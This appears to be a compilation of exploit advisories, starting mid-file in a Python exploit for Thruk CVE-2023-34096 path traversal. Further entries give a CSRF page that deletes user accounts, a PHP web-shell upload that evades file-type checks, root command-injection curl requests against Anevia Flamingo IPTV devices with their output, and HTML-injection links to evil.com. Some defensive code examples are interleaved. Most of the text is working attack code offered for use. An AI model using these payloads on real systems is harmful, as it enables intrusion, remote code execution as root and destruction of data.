            return thruk_version
        else:
            cprint("[-] ", "red", attrs=['bold'], end = "")
            print("There was an error retrieving Thruk's version.")
            sys.exit(-1)


def get_error_info():
    """
    Function to cause an error in the target Thruk instance and collect additional information via web scraping.
    """
    # URL that will cause an error
    error_url = target + "//cgi-bin/login.cgi"

    # Retrieve Any initial Cookies
    error_response = requests.get(error_url,
                                  headers=headers,
                                  allow_redirects=False,
                                  verify=False,
                                  timeout=10)

    cprint("[*] ", "blue", attrs=['bold'], end = "")
    print("Trying to retrieve additional information...\n")
    try:
        # Search for the error tag
        html_soup = BeautifulSoup(error_response.text, "html.parser")
        error_report = html_soup.find_all("pre", {"class": "text-left mt-5"})[0].text
        if len(error_report) > 0:
            # Print Error Info
            error_report = error_report[error_report.find("Version"):error_report.find("\n\nStack")]
            cprint("[+] ", "green", attrs=['bold'], end = "")
            print("Recovered Information: \n")
            parsed_error_report = error_report.split("\n")
            for error_line in parsed_error_report:
                print(f"     {error_line}")
    except:
        cprint("[-] ", "red", attrs=['bold'], end = "")
        print("No additional information available.\n")


def get_thruk_session_auto_login():
    """
    Function to login into the Thruk instance and retrieve a valid session.
    It will use default Thruk's credentials available here:
    - https://www.thruk.org/documentation/install.html
    
    Change credentials if required.
    """
    # Default Credentials - Change if required
    username = "thrukadmin" # CHANGE ME
    password = "thrukadmin" # CHANGE ME
    params = {"login": username, "password": password}

    cprint("[*] ", "blue", attrs=['bold'], end = "")
    print(f"Trying to authenticate with provided credentials: {username}/{password}\n")

    # Define Login URL
    login_url = "cgi-bin/login.cgi"

    session = requests.Session()
    # Retrieve Any initial Cookies
    session.get(target, headers=headers, allow_redirects=True, verify=False)

    # Login and get thruk_auth Cookie
    session.post(target + login_url, data=params, headers=headers, allow_redirects=False, verify=False)

    # Get Cookies as dictionary
    cookies = session.cookies.get_dict()

    # Successful Login
    if cookies.get('thruk_auth') is not None:
        cprint("[+] ", "green", attrs=['bold'], end = "")
        print("Successful Authentication!\n")
        cprint("[+] ", "green", attrs=['bold'], end = "")
        print(f"Login Cookie: thruk_auth={cookies.get('thruk_auth')}\n")
        return session
    # Failed Login: exit in every case so the caller never receives None as a session
    else:
        cprint("[-] ", "red", attrs=['bold'], end = "")
        if cookies.get('thruk_message') == "fail_message~~login%20failed":
            print("Login Failed, check your credentials.")
        else:
            print("Login Failed, no thruk_auth cookie was returned.")
        sys.exit(401)


def cve_2023_34096_exploit_path_traversal(logged_session):
    """
    Function that attempts to exploit the Path Traversal Vulnerability.
    The exploit tries to upload a PoC file to several common folders,
    so that a single unwritable directory does not produce a false negative.
    """
    cprint("[*] ", "blue", attrs=['bold'], end = "")
    print("Trying to exploit: ", end = "")
    cprint("CVE-2023-34096 - Path Traversal\n", "yellow", attrs=['bold'])

    # Define Upload URL
    upload_url = "cgi-bin/panorama.cgi"

    # Absolute paths
    common_folders = ["/tmp/",
                      "/etc/thruk/plugins/plugins-enabled/",
                      "/etc/thruk/panorama/",
                      "/etc/thruk/bp/",
                      "/etc/thruk/thruk_local.d/",
                      "/var/www/",
                      "/var/www/html/",
                      "/etc/",
    ]

    # Upload PoC file to each folder
    for target_folder in common_folders:
        # PoC file extension is jpg due to regex validations of Thruk.
        # Nevertheless this issue can still cause damage in different ways to the affected instance.
        files = {'image': ("exploit.jpg", "CVE-2023-34096-Exploit-PoC-by-galoget")}
        data = {"task": "upload",
                "type": "image",
                "location": f"backgrounds/../../../..{target_folder}"
        }

        upload_response = logged_session.post(target + upload_url,
                                    data=data,
                                    files=files,
                                    headers=headers,
                                    allow_redirects=False,
                                    verify=False)

        try:
            upload_response = upload_response.json()
            if upload_response.get("msg") == "Upload successfull" and upload_response.get("success") is True:
                cprint("[+] ", "green", attrs=['bold'], end = "")
                print(f"File successfully uploaded to folder: {target_folder}{files.get('image')[0]}\n")
            elif upload_response.get("msg") == "Fileupload must use existing and writable folder.":
                cprint("[-] ", "red", attrs=['bold'], end = "")
                print(f"File upload to folder \'{target_folder}{files.get('image')[0]}\' failed due to write permissions or non-existent folder!\n")
            else:
                cprint("[-] ", "red", attrs=['bold'], end = "")
                print("File upload failed.\n")
        except:
            cprint("[-] ", "red", attrs=['bold'], end = "")
            print("File upload failed.\n")



if __name__ == "__main__":
    banner()
    usage_instructions()

    # Change this with the domain or IP address to attack
    if sys.argv[1] and sys.argv[1].startswith("http"):
        target = sys.argv[1]
    else:
        target = "http://127.0.0.1/thruk/"

    # Prepare Base Target URL
    if not target.endswith('/'):
        target += "/"

    cprint("[+] ", "green", attrs=['bold'], end = "")
    print(f"Target URL: {target}\n")

    # Get Thruk version via web scraping
    scraped_thruk_version = get_thruk_version()

    # Send a request that will generate an error and collect extra info
    get_error_info()

    # Check if the instance is vulnerable to CVE-2023-34096
    vulnerable_status = check_vulnerability(scraped_thruk_version)

    if vulnerable_status:
        cprint("[+] ", "green", attrs=['bold'], end = "")
        print("The Thruk version found in this host is vulnerable to CVE-2023-34096. Do you want to try to exploit it?")

        # Confirm exploitation
        option = input("\nChoice (Y/N): ").lower()
        print("")

        if option == "y":
            cprint("[*] ", "blue", attrs=['bold'], end = "")
            print("The tool will attempt to exploit the vulnerability by uploading a PoC file to common folders...\n")
            # Login into Thruk instance
            valid_session = get_thruk_session_auto_login()
            # Exploit Path Traversal Vulnerability
            cve_2023_34096_exploit_path_traversal(valid_session)
        elif option == "n":
            cprint("[*] ", "blue", attrs=['bold'], end = "")
            print("No exploitation attempts were performed, Goodbye!\n")
            sys.exit(0)
        else:
            cprint("[-] ", "red", attrs=['bold'], end = "")
            print("Unknown option entered.")
            sys.exit(1)
    else:
        cprint("[-] ", "red", attrs=['bold'], end = "")
        print("The current Thruk's version is NOT VULNERABLE to CVE-2023-34096.")
        sys.exit(2)
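The exploit's location value `backgrounds/../../../..<folder>` escapes the intended upload directory because the target path is built from client input without being anchored to the upload root. The Python below is an added example of the containment check an upload handler should perform; it is not Thruk's code. UPLOAD_ROOT, ALLOWED_SUBDIRS and the filename pattern are assumptions, chosen so that the advisory's payload reaches /tmp through the naive join.

```python
import posixpath
import re

# Assumed layout (not Thruk's real directory structure): uploads are meant to land in
# an allow-listed sub-folder of this root, e.g. "backgrounds/".
UPLOAD_ROOT = "/var/lib/thruk"
ALLOWED_SUBDIRS = {"backgrounds", "icons"}
# Assumed filename policy: simple name plus an image extension, no directories.
FILENAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(jpg|jpeg|png|gif)$")


def naive_target_dir(location):
    """Vulnerable pattern: trust the client-supplied 'location' and join it onto the root."""
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, location))


def safe_target_dir(location):
    """
    Hardened: refuse absolute paths and NUL bytes, normalise, then require the result to
    stay inside UPLOAD_ROOT and to start with an allow-listed sub-folder. Lexical
    normalisation does not see symlinks; on a real filesystem also realpath() the
    directory once it exists and repeat the prefix check.
    """
    if not location or location.startswith("/") or "\x00" in location:
        raise ValueError("absolute path, empty path or NUL byte in location")
    resolved = posixpath.normpath(posixpath.join(UPLOAD_ROOT, location))
    if not resolved.startswith(UPLOAD_ROOT + "/"):
        raise ValueError(f"location escapes upload root: {resolved}")
    first_component = posixpath.relpath(resolved, UPLOAD_ROOT).split("/")[0]
    if first_component not in ALLOWED_SUBDIRS:
        raise ValueError(f"sub-folder not allowed: {first_component}")
    return resolved


def safe_upload_path(location, filename):
    """Combine both checks; the filename is reduced to its basename before validation."""
    name = posixpath.basename(filename.replace("\\", "/"))
    if not FILENAME_RE.match(name):
        raise ValueError(f"filename not allowed: {filename!r}")
    return posixpath.join(safe_target_dir(location), name)


def is_rejected(location, filename="exploit.jpg"):
    """Convenience wrapper: True when the hardened check refuses the input."""
    try:
        safe_upload_path(location, filename)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = "backgrounds/../../../../tmp/"          # the advisory's location value
    print("naive join writes to :", naive_target_dir(payload))
    print("hardened check rejects:", is_rejected(payload))
    print("legitimate upload     :", safe_upload_path("backgrounds/", "exploit.jpg"))
```

The prefix test must compare against `UPLOAD_ROOT + "/"`, not `UPLOAD_ROOT`, otherwise a sibling such as `/var/lib/thruk2` would pass; the sub-folder allow-list additionally stops writes into the root itself.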
            
# Exploit Title: Online Examination System Project 1.0 - Cross-site request forgery (CSRF)
# Google Dork: n/a
# Date: 09/06/2023
# Exploit Author: Ramil Mustafayev (kryptohaker)
# Vendor Homepage: https://github.com/projectworldsofficial/online-examination-systen-in-php
# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip
# Version: 1.0
# Tested on: Windows 10, XAMPP for Windows 8.0.28 / PHP 8.0.28
# CVE : n/a

Online Examination System Project <=1.0 versions (PHP/MYSQL) are vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious link that, when clicked by an admin user, will delete a user account from the database without the admin’s consent. This is possible because the application uses GET requests to perform account deletion and does not implement any CSRF protection mechanism. The email of the user to be deleted is passed as a parameter in the URL, which can be manipulated by the attacker. This could result in loss of data.

To exploit this vulnerability, an attacker needs to do the following:

1. Identify the URL of the target application where Online Examination System Project is installed. For example, http://example.com/
2. Identify the email address of a user account that the attacker wants to delete. For example, victim@example.com
3. Create an HTML page that contains a hidden form with the target URL and the user email as parameters. For example:

<html>
  <body>
    <form action="http://example.com/update.php" method="GET">
      <input type="hidden" name="demail" value="victim@example.com" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

4. Host the HTML page on a server that is accessible by the admin user of the target application. For example, http://attacker.com/poc.html
5. Send the URL of the HTML page to the admin user via email, social media, or any other means.

If the admin user visits the URL of the HTML page, the script will submit the form and delete the user account associated with the email address from the database without the admin’s consent or knowledge.
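As an added illustration (not the project's code) of why the GET-based deletion above is forgeable and what the fix looks like, here is the same deletion as a minimal Python handler in both forms, driven by a constructed in-memory session and users table. The forged request is exactly what the hidden form above sends: a top-level GET carrying only demail.

```python
import hmac
import secrets


def delete_account(email, users):
    """The deletion itself; both handlers below end up here."""
    if email not in users:
        return 404, "no such user"
    users.discard(email)
    return 200, f"deleted {email}"


def delete_user_vulnerable(request, users):
    """The pattern the advisory describes: any request carrying demail, GET included, deletes."""
    return delete_account(request["params"].get("demail"), users)


def issue_csrf_token(session):
    """Synchronizer token: random per session, kept server-side, embedded in the admin's own form."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def delete_user_hardened(request, session, users):
    """State-changing action: POST only, and the submitted token must equal the session's copy."""
    if request["method"] != "POST":
        return 405, "deletion requires POST"
    expected = session.get("csrf_token")
    supplied = request["params"].get("csrf_token", "")
    # Constant-time comparison on bytes; a missing session token always fails.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "missing or invalid CSRF token"
    return delete_account(request["params"].get("demail"), users)


def forged_request():
    """What the attacker's auto-submitting form sends: a top-level GET carrying only demail."""
    return {"method": "GET", "params": {"demail": "victim@example.com"}}


if __name__ == "__main__":
    users = {"victim@example.com", "admin@example.com"}     # constructed users table
    session = {}                                           # constructed admin session
    print("vulnerable:", delete_user_vulnerable(forged_request(), users))
    print("hardened, forged GET:", delete_user_hardened(forged_request(), session, users))
    token = issue_csrf_token(session)
    legit = {"method": "POST", "params": {"demail": "admin@example.com", "csrf_token": token}}
    print("hardened, legitimate POST:", delete_user_hardened(legit, session, users))
```

The attacker's page cannot read the token because it lives in the admin's session and is only written into pages served to the admin, so a cross-site form cannot supply it. A SameSite=Lax session cookie is worth adding as well, but note that Lax still sends the cookie on top-level GET navigations, which is exactly the request this PoC makes; that is why the action must also stop accepting GET.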
            
Exploit Title: Teachers Record Management System 1.0 – File Upload Type Validation
Date: 17-01-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://phpgurukul.com>
Software Link: <https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3187

===============================
STEPS_TO_REPRODUCE
===============================
1. Log in to a teacher account with the credentials Username: jogoe12@yourdomain.com / Password: Test@123
2. Navigate to the Profile section and edit the profile picture by clicking on Edit Image.
3. Open Burp Suite and intercept the Edit Image request.
4. In the POST request, change the filename from "profile picture.png" to "profile picture.php.gif".
5. Change the Content-Type from "image/png" to "image/gif".
6. Replace the file body with this payload: `GIF89a <?php echo system($_REQUEST['dx']); ?>`
7. GIF89a is the GIF file signature (magic bytes); together with the .php.gif double extension it gets the file past the upload type check.
8. Below is the Burp Suite POST request with all of the changes made above.

==========================================
BURPSUITE_REQUEST
==========================================
POST /trms/teacher/changeimage.php HTTP/1.1
Host: localhost
Content-Length: 442
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryndAPYa0GGOxSUHdF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/trms/teacher/changeimage.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=8alf0rbfjmhm3ddra7si0cv7qc
Connection: close

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="subjects"

John Doe
------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="newpic"; filename="profile picture.php.gif"
Content-Type: image/gif

GIF89a <?php echo system($_REQUEST['dx']); ?>

------WebKitFormBoundaryndAPYa0GGOxSUHdF
Content-Disposition: form-data; name="submit"


------WebKitFormBoundaryndAPYa0GGOxSUHdF--


===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Teacher_Record_Management_System/trms.md
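The request above slips past the upload check with a double extension and a GIF signature in front of PHP code. Below is an added Python example, not the application's code, of the server-side validation that rejects it: exactly one allow-listed extension, a Content-Type and file signature that agree with it, and a server-generated stored name. The payload from the Burp request is embedded as the constructed test input.

```python
import secrets

# Allowed image types: extension -> (expected Content-Type, accepted file signatures).
ALLOWED_TYPES = {
    "png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    "gif": ("image/gif", (b"GIF87a", b"GIF89a")),
    "jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
}

# Constructed from the Burp request above.
EXPLOIT_FILENAME = "profile picture.php.gif"
EXPLOIT_CONTENT_TYPE = "image/gif"
EXPLOIT_BODY = b"GIF89a <?php echo system($_REQUEST['dx']); ?>"


def validate_image_upload(filename, content_type, content):
    """
    Return (accepted, reason, stored_name). The client's filename is used only to read
    the extension; the name the file is stored under is generated server-side.
    """
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = name.split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required (double extensions such as .php.gif are rejected)", None
    ext = "jpg" if parts[1] == "jpeg" else parts[1]
    if ext not in ALLOWED_TYPES:
        return False, f"extension not allowed: .{ext}", None
    expected_type, signatures = ALLOWED_TYPES[ext]
    if content_type != expected_type:
        return False, f"Content-Type {content_type} does not match .{ext}", None
    if not content.startswith(signatures):
        return False, "file signature does not match extension", None
    # Random stored name: the user never controls the path or extension on disk.
    return True, "ok", f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    print(validate_image_upload(EXPLOIT_FILENAME, EXPLOIT_CONTENT_TYPE, EXPLOIT_BODY))
    print(validate_image_upload("profile picture.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
```

A body of `GIF89a <?php ...` with a plain `.gif` name would still be stored, but under a random `.gif` name that the web server does not hand to PHP; re-encoding accepted images with an image library before storing them removes the embedded code as well, and the uploads directory should not have script execution enabled in any case.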
            
Exploit Title: Anevia Flamingo XL 3.6.20 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.20, 3.2.9
                  Hardware revision 1.1, 1.0
                  SoapLive 2.4.1, 2.0.3
                  SoapSystem 1.3.1

Summary: Flamingo XL is a modular, high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.

Desc: The affected device suffers from an authenticated remote code
execution vulnerability: the ntp parameter of /admin/time.php is
passed to a shell command without sanitisation. A remote, authenticated
attacker can inject arbitrary system commands, which run with root
privileges.

Tested on: GNU/Linux 3.1.4 (x86_64)
           Apache/2.2.15 (Unix)
           mod_ssl/2.2.15
           OpenSSL/0.9.8g
           DAV/2
           PHP/5.3.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5779
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5779.php


13.04.2023

--


> curl -vL http://192.168.1.1/admin/time.php -H "Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4" -d "ntp=`id`&request=ntp&update=Sync" |findstr root
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 192.168.1.1:80...
* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded
>
} [32 bytes data]
100    32    0     0  100    32      0     25  0:00:01  0:00:01 --:--:--    25< HTTP/1.1 302 Found
< Date: Thu, 13 Apr 2023 23:54:15 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
* Please rewind output before next send
< Location: /admin/time.php
< Transfer-Encoding: chunked
< Content-Type: text/html
<
* Ignoring the response-body
{ [5 bytes data]
100    32    0     0  100    32      0     19  0:00:01  0:00:01 --:--:--    19
* Connection #0 to host 192.168.1.1 left intact
* Issue another request to this URL: 'http://192.168.1.1/admin/time.php'
* Switch from POST to GET
* Found bundle for host: 0x1de6c6321b0 [serially]
* Re-using existing connection #0 with host 192.168.1.1
> POST /admin/time.php HTTP/1.1
> Host: 192.168.1.1
> User-Agent: curl/8.0.1
> Accept: */*
> Cookie: PHPSESSID=i3nu7de9vv0q9pi4a8eg8v71b4
>
< HTTP/1.1 200 OK
< Date: Thu, 13 Apr 2023 23:54:17 GMT
< Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6
< X-Powered-By: PHP/5.3.6
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< Transfer-Encoding: chunked
< Content-Type: text/html
<
{ [13853 bytes data]
14 Apr 03:54:17 ntpdate[8964]: can't find host uid=0(root)<br />    <----------------------<<
14 Apr 03:54:17 ntpdate[8964]: can't find host gid=0(root)<br />    <----------------------<<
100 33896    0 33896    0     0  14891      0 --:--:--  0:00:02 --:--:--   99k
* Connection #0 to host 192.168.1.1 left intact
            
Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.5
                  Hardware revision: 1.1
                  SoapLive 2.4.0
                  SoapSystem 1.3.1

Summary: Flamingo XL is a modular, high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.

Desc: The affected device suffers from an authenticated remote code
execution vulnerability: the ntp_hosts[] parameter of /admin/time.php
is passed to a shell command without sanitisation. A remote,
authenticated attacker can inject arbitrary system commands, which
run as the web server user and, through sudo, with root privileges.

Tested on: GNU/Linux 3.14.29 (x86_64)
           Apache/2.2.22 (Debian)
           PHP/5.6.0-0anevia2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5778
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php


13.04.2023

--


$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data
        <td>uid=33(www-data)</td>
          <input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>
        <td>gid=33(www-data)</td>
          <input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>
        <td>groups=33(www-data),6(disk),25(floppy)</td>
          <input type="hidden" name="ntp_hosts[]" value="groups=33(www-data),6(disk),25(floppy)"/>


The injected command runs as the web server user (www-data). That account can run
sudo without a password, so prefixing the command with sudo yields root:

---


$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60sudo%20id%60&ntp_address=&update=Apply&request=ntp" |findstr root
        <td>uid=0(root)</td>
          <input type="hidden" name="ntp_hosts[]" value="uid=0(root)"/>
        <td>gid=0(root)</td>
          <input type="hidden" name="ntp_hosts[]" value="gid=0(root)"/>
        <td>groups=0(root)</td>
          <input type="hidden" name="ntp_hosts[]" value="groups=0(root)"/>
            
Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities 
Google Dork: NA
Date: 09-06-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://www.sourcecodester.com/>
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3184

==============================
CREDENTIAL TO USE
==============================
ADMIN-ACCOUNT
USERNAME: admin
PASSWORD: admin123

=============================
PAYLOAD_USED
=============================
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>


===============================
STEPS_TO_REPRODUCE
===============================
1. First, log in with the admin credentials given above.
2. Navigate to User List and click the `Create New` button, or open this URL: `http://localhost/php-sts/admin/?page=user/manage_user`
3. Fill in the details, putting the payloads above in `firstname`, `middlename`, `lastname` and `username`.
4. After entering the payloads, click the Save button.
5. After saving the form you are redirected to the admin site, where you can see that the new user has been added.
6. Clicking on each payload redirected me to the evil site.



==========================================
BURPSUITE_REQUEST
==========================================
POST /php-sts/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 1037
sec-ch-ua: 
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn
Connection: close

------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="id"


------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="firstname"

<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="middlename"

<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="lastname"

<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="username"

<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="password"

1234
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary7hwjNQW3mptDFOwo--

===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md